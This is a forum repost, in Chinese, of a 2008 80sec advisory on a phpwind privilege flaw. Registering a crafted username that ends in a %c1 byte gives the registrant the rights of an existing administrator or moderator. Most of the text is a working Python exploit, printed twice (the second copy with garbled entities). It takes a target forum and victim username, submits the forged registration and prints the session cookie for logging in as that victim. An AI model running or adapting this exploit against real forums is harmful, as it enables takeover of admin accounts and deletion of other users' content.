漏洞发布：http://www.80sec.com/
漏洞作者：jianxin@80sec.com
漏洞厂商： http://www.phpwind.com/  本漏洞影响phpwind所有版本
漏洞危害：高
漏洞说明：phpwind是国内使用非常广泛的一款程序，由于在程序设计上存在错误，导致任何人可以取得前台管理员及斑主权限，做删除帖子等任意操作
利用方式：http://www.80sec.com有提供exploit
漏洞分析：由于phpwind论坛在设计上对数据库存储机制不了解，导致在程序逻辑上判断有问题，用精心构造的数据注册用户即可获得管理权限
漏洞修补：建议关闭注册功能等待官方出补丁
漏洞状态：
08.5.25发现此漏洞
08.6.1由80sec.com公开此漏洞
暂无补丁
原始地址：http://www.80sec.com/release/phpwind-exploit.txt
漏洞测试：

复制内容到剪贴板

代码:

# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_opener(cookies)


def banner():
    print ""
    print "########################################################"
    print "hpwind所有版本管理权限泄露漏洞利用poc"
    print "Copyright (C) 2006"
    print "jianxin@80sec.com"
    print "80sec是一个新的致力于web安全的小团体"
    print "http://www.80sec.com"

def usage():
    banner()
    print "Usage:\n"
    print "   $ ./phpwind.py pwforumurl usertoattack\n"
    print "   pwforumurl        目标论坛地址如http://www.80sec.com/"
    print "   usertoattack        目标拥有权限的斑竹或管理员"
    print "   攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
    print "   最新版本可以使用uid登陆"
    print "   其他版本可以使用cookie+useragent登陆"
    print "########################################################"
    print ""


argvs=sys.argv
usage()


data = "regname=%s%s1&regpwd=@80sec&regpwdrepeat=@80sec&regemail=foo@foo.com&regemailtoall=1&step=2" % (argvs[2],"%c1")
pwurl = "%s/register.php" % argvs[1]

request = urllib2.Request(
        url     = pwurl ,
        headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
        data    = data)

f=opener.open(request)
headers=f.headers.dict
cookie=headers["set-cookie"]
try:
        if cookie.index('winduser'):
                print "Exploit Success!"
                print "Login with uid password @80sec or Cookie:"
                print cookie
                print "User-agent: 80sec owned this"
except:
        print "Error! http://www.80sec.com"
        print "Connect root#80sec.com"

附利用程序Python代码：

# -*- coding: gb2312 -*-
• import
  urllib2,httplib,sys
• httplib.HTTPConnection.debuglevel = 1
• cookies = urllib2.HTTPCookieProcessor()
• opener = urllib2.build_opener(cookies)
• def
  banner():
• 
  print
  ""
• 
  print
  "########################################################"
• 
  print
  "Phpwind所有版本管理权限泄露漏洞利用poc"
• 
  print
  "Copyright (C) 2006"
• 
  print
  "jianxin@80sec.com"
• 
  print
  "80sec是一个新的致力于web安全的小团体"
• 
  print
  "http://www.80sec.com"
• def
  usage():
• 
  banner()
• 
  print
  "Usage:\n"
• 
  print
  "   $ ./phpwind.py pwforumurl usertoattack\n"
• 
  print
  "   pwforumurl    目标论坛地址如http://www.80sec.com/"
• 
  print
  "   usertoattack    目标拥有权限的斑竹或管理员"
• 
  print
  "   攻击结果将会在目标论坛注册一个和目标用户一样的帐户"
• 
  print
  "   最新版本可以使用uid登陆"
• 
  print
  "   其他版本可以使用cookie+useragent登陆"
• 
  print
  "########################################################"
• 
  print
  ""
• argvs=sys.argv
• usage()
• data = "regname=%s%s1®pwd=@80sec®pwdrepeat=@80sec®email=foo@foo.com®emailtoall=1&step=2" % (argvs[2],"%c1")
• pwurl = "%s/register.php" % argvs[1]
• request = urllib2.Request(
• 
  url     = pwurl ,
• 
  headers = {'Content-Type' : 'application/x-www-form-urlencoded','User-Agent': '80sec owned this'},
• 
  data    = data)
• f=opener.open(request)
• headers=f.headers.dict
• cookie=headers["set-cookie"]
• try:
• 
  if
  cookie.index('winduser'):
• 
  print
  "Exploit Success!"
• 
  print
  "Login with uid password @80sec or Cookie:"
• 
  print
  cookie
• 
  print
  "User-agent: 80sec owned this"
• except:
• 
  print
  "Error! http://www.80sec.com"
• 
  print
  "Connect root#80sec.com"

[ 本帖最后由 oaf 于 2008-6-1 20:36 编辑 ]

漏洞！